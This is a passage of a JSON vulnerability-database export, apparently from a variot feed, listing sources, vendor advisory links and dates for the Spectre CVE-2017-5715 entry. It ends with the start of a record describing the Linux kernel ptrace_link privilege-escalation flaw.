        "db": "PACKETSTORM",
        "id": "145762",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146714",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145809",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146501",
        "trust": 0.1
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-152",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-113918",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145710",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147454",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145650",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145653",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146008",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146530",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145673",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147067",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145635",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00302"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113918"
      },
      {
        "db": "PACKETSTORM",
        "id": "145710"
      },
      {
        "db": "PACKETSTORM",
        "id": "147454"
      },
      {
        "db": "PACKETSTORM",
        "id": "145650"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145653"
      },
      {
        "db": "PACKETSTORM",
        "id": "146167"
      },
      {
        "db": "PACKETSTORM",
        "id": "146008"
      },
      {
        "db": "PACKETSTORM",
        "id": "146530"
      },
      {
        "db": "PACKETSTORM",
        "id": "145673"
      },
      {
        "db": "PACKETSTORM",
        "id": "147067"
      },
      {
        "db": "PACKETSTORM",
        "id": "150083"
      },
      {
        "db": "PACKETSTORM",
        "id": "145635"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5715"
      }
    ]
  },
  "id": "VAR-201801-0826",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00302"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113918"
      }
    ],
    "trust": 1.3670634874999998
  },
  "iot_taxonomy": {
    "_id": null,
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00302"
      }
    ]
  },
  "last_update_date": "2026-04-10T22:29:00.683000Z",
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-203",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-200",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-113918"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5715"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.9,
        "url": "https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability"
      },
      {
        "trust": 1.9,
        "url": "http://www.kb.cert.org/vuls/id/584653"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/102376"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/security/vulnerabilities/speculativeexecution"
      },
      {
        "trust": 1.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00115.html"
      },
      {
        "trust": 1.6,
        "url": "https://support.apple.com//ht208394"
      },
      {
        "trust": 1.6,
        "url": "http://www.dell.com/support/speculative-store-bypass"
      },
      {
        "trust": 1.2,
        "url": "https://security.gentoo.org/glsa/201810-06"
      },
      {
        "trust": 1.1,
        "url": "https://seclists.org/bugtraq/2019/jun/36"
      },
      {
        "trust": 1.1,
        "url": "https://seclists.org/bugtraq/2019/nov/16"
      },
      {
        "trust": 1.1,
        "url": "https://www.kb.cert.org/vuls/id/180049"
      },
      {
        "trust": 1.1,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180104-cpusidechannel"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4609"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4611"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4613"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4614"
      },
      {
        "trust": 1.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2018-001.txt"
      },
      {
        "trust": 1.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2019-003.txt"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
      },
      {
        "trust": 1.1,
        "url": "http://xenbits.xen.org/xsa/advisory-254.html"
      },
      {
        "trust": 1.1,
        "url": "https://aws.amazon.com/de/security/security-bulletins/aws-2018-013/"
      },
      {
        "trust": 1.1,
        "url": "https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-608355.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://cert.vde.com/en-us/advisories/vde-2018-002"
      },
      {
        "trust": 1.1,
        "url": "https://cert.vde.com/en-us/advisories/vde-2018-003"
      },
      {
        "trust": 1.1,
        "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes"
      },
      {
        "trust": 1.1,
        "url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv180002"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20180104-0001/"
      },
      {
        "trust": 1.1,
        "url": "https://security.paloaltonetworks.com/cve-2017-5715"
      },
      {
        "trust": 1.1,
        "url": "https://support.citrix.com/article/ctx231399"
      },
      {
        "trust": 1.1,
        "url": "https://support.f5.com/csp/article/k91229003"
      },
      {
        "trust": 1.1,
        "url": "https://support.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03805en_us"
      },
      {
        "trust": 1.1,
        "url": "https://support.lenovo.com/us/en/solutions/len-18282"
      },
      {
        "trust": 1.1,
        "url": "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-18-0001"
      },
      {
        "trust": 1.1,
        "url": "https://www.suse.com/c/suse-addresses-meltdown-spectre-vulnerabilities/"
      },
      {
        "trust": 1.1,
        "url": "https://www.synology.com/support/security/synology_sa_18_01"
      },
      {
        "trust": 1.1,
        "url": "https://www.vmware.com/security/advisories/vmsa-2018-0007.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.vmware.com/us/security/advisories/vmsa-2018-0002.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.vmware.com/us/security/advisories/vmsa-2018-0004.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4120"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4187"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4188"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4213"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/43427/"
      },
      {
        "trust": 1.1,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-18:03.speculative_execution.asc"
      },
      {
        "trust": 1.1,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-19:26.mcu.asc"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/145645/spectre-information-disclosure-proof-of-concept.html"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/155281/freebsd-security-advisory-freebsd-sa-19-26.mcu.html"
      },
      {
        "trust": 1.1,
        "url": "https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html"
      },
      {
        "trust": 1.1,
        "url": "https://security.googleblog.com/2018/01/todays-cpu-vulnerability-what-you-need.html"
      },
      {
        "trust": 1.1,
        "url": "https://spectreattack.com/"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/05/msg00000.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00015.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00007.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00017.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00025.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00019.html"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0292"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1040071"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00002.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00003.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00004.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00005.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00006.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00007.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00008.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00012.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00013.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00009.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00014.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00016.html"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/usn/usn-3516-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3531-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3531-3/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3540-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3541-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3542-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3549-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3560-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3561-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3580-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3581-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3581-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3582-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3582-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3594-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3597-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3597-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3620-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3690-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3777-3/"
      },
      {
        "trust": 1.0,
        "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03871en_us"
      },
      {
        "trust": 1.0,
        "url": "https://security-center.intel.com/advisory.aspx?intelid=intel-sa-00088\u0026languageid=en-fr"
      },
      {
        "trust": 0.8,
        "url": "https://vuls.cert.org/confluence/display/wiki/vulnerabilities+associated+with+cpu+speculative+execution"
      },
      {
        "trust": 0.8,
        "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1528"
      },
      {
        "trust": 0.8,
        "url": "https://developer.amd.com/wp-content/resources/124441_amd64_speculativestorebypassdisable_whitepaper_final.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://www.us-cert.gov/ncas/alerts/ta18-141a"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/208.html"
      },
      {
        "trust": 0.8,
        "url": "https://software.intel.com/sites/default/files/managed/c5/63/336996-speculative-execution-side-channel-mitigations.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://software.intel.com/sites/default/files/managed/b9/f9/336983-intel-analysis-of-speculative-execution-side-channels-white-paper.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180521-cpusidechannel"
      },
      {
        "trust": 0.8,
        "url": "https://fortiguard.com/psirt/fg-ir-18-002"
      },
      {
        "trust": 0.8,
        "url": "https://support.hp.com/us-en/document/c06001626"
      },
      {
        "trust": 0.8,
        "url": "http://www.hitachi.com/hirt/publications/hirt-pub18001/"
      },
      {
        "trust": 0.8,
        "url": "https://www.ibm.com/blogs/psirt/potential-impact-processors-power-family/"
      },
      {
        "trust": 0.8,
        "url": "https://docs.microsoft.com/en-us/cpp/security/developer-guidance-speculative-execution"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/vulnerabilities/ssbd"
      },
      {
        "trust": 0.8,
        "url": "https://www.suse.com/support/kb/doc/?id=7022937"
      },
      {
        "trust": 0.8,
        "url": "https://www.synology.com/en-global/support/security/synology_sa_18_23"
      },
      {
        "trust": 0.8,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/variant4"
      },
      {
        "trust": 0.8,
        "url": "https://kb.vmware.com/s/article/54951"
      },
      {
        "trust": 0.8,
        "url": "https://aws.amazon.com/security/security-bulletins/aws-2018-015/"
      },
      {
        "trust": 0.6,
        "url": "https://www.bleepingcomputer.com/news/security/list-of-meltdown-and-spectre-vulnerability-advisories-patches-and-updates"
      },
      {
        "trust": 0.6,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2017-5715"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5715"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5753"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5754"
      },
      {
        "trust": 0.2,
        "url": "https://security-tracker.debian.org/tracker/linux"
      },
      {
        "trust": 0.2,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.2,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://security-center.intel.com/advisory.aspx?intelid=intel-sa-00088\u0026amp;languageid=en-fr"
      },
      {
        "trust": 0.1,
        "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03871en_us"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0056"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/solutions/3307851"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10323"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7757"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5803"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18241"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1066"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1093"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1068"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7566"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18224"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7740"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18218"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000199"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8087"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18193"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17975"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8822"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1092"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18216"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1108"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1065"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8781"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7480"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18222"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7995"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18257"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0013"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3523-1,"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3541-1,"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.13.0-37.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.13.0-1015.16"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3597-1,"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0012"
      },
      {
        "trust": 0.1,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/spectreandmeltdown"
      },
      {
        "trust": 0.1,
        "url": "https://www.ubuntu.com/usn/usn-3549-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1017.22"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0108"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5750"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0039"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17741"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000026"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5332"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3620-2"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12762"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-11089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17448"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3620-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17807"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17805"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5244"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7542"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12892"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10471"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12891"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12893"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10982"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15469"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10472"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3620"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10981"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15468"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3646"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15470"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7541"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7540"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-5753"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-5754"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0010"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00302"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113918"
      },
      {
        "db": "PACKETSTORM",
        "id": "145710"
      },
      {
        "db": "PACKETSTORM",
        "id": "147454"
      },
      {
        "db": "PACKETSTORM",
        "id": "145650"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145653"
      },
      {
        "db": "PACKETSTORM",
        "id": "146167"
      },
      {
        "db": "PACKETSTORM",
        "id": "146008"
      },
      {
        "db": "PACKETSTORM",
        "id": "146530"
      },
      {
        "db": "PACKETSTORM",
        "id": "145673"
      },
      {
        "db": "PACKETSTORM",
        "id": "147067"
      },
      {
        "db": "PACKETSTORM",
        "id": "150083"
      },
      {
        "db": "PACKETSTORM",
        "id": "145635"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5715"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#180049",
        "ident": null
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00302",
        "ident": null
      },
      {
        "db": "VULHUB",
        "id": "VHN-113918",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145710",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "147454",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145650",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "146771",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145653",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "146167",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "146008",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "146530",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145673",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "147067",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "150083",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145635",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5715",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2018-05-21T00:00:00",
        "db": "CERT/CC",
        "id": "VU#180049",
        "ident": null
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-00302",
        "ident": null
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "VULHUB",
        "id": "VHN-113918",
        "ident": null
      },
      {
        "date": "2018-01-06T17:59:52",
        "db": "PACKETSTORM",
        "id": "145710",
        "ident": null
      },
      {
        "date": "2018-05-03T01:35:46",
        "db": "PACKETSTORM",
        "id": "147454",
        "ident": null
      },
      {
        "date": "2018-01-04T17:50:30",
        "db": "PACKETSTORM",
        "id": "145650",
        "ident": null
      },
      {
        "date": "2018-03-15T15:54:32",
        "db": "PACKETSTORM",
        "id": "146771",
        "ident": null
      },
      {
        "date": "2018-01-04T17:50:56",
        "db": "PACKETSTORM",
        "id": "145653",
        "ident": null
      },
      {
        "date": "2018-01-30T17:07:09",
        "db": "PACKETSTORM",
        "id": "146167",
        "ident": null
      },
      {
        "date": "2018-01-22T03:16:00",
        "db": "PACKETSTORM",
        "id": "146008",
        "ident": null
      },
      {
        "date": "2018-02-22T12:22:00",
        "db": "PACKETSTORM",
        "id": "146530",
        "ident": null
      },
      {
        "date": "2018-01-05T00:37:21",
        "db": "PACKETSTORM",
        "id": "145673",
        "ident": null
      },
      {
        "date": "2018-04-05T20:41:59",
        "db": "PACKETSTORM",
        "id": "147067",
        "ident": null
      },
      {
        "date": "2018-10-31T01:14:40",
        "db": "PACKETSTORM",
        "id": "150083",
        "ident": null
      },
      {
        "date": "2018-01-04T00:52:58",
        "db": "PACKETSTORM",
        "id": "145635",
        "ident": null
      },
      {
        "date": "2018-01-04T13:29:00.227000",
        "db": "NVD",
        "id": "CVE-2017-5715",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2018-06-19T00:00:00",
        "db": "CERT/CC",
        "id": "VU#180049",
        "ident": null
      },
      {
        "date": "2018-01-11T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-00302",
        "ident": null
      },
      {
        "date": "2020-05-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-113918",
        "ident": null
      },
      {
        "date": "2025-05-06T15:15:51.640000",
        "db": "NVD",
        "id": "CVE-2017-5715",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "146167"
      },
      {
        "db": "PACKETSTORM",
        "id": "147067"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "_id": null,
    "data": "CPU hardware utilizing speculative execution may be vulnerable to cache side-channel attacks",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      }
    ],
    "trust": 0.8
  }
}

VAR-201907-1641

Vulnerability from variot - Updated: 2026-04-10 22:28

In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in some environments. Linux Kernel Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state.

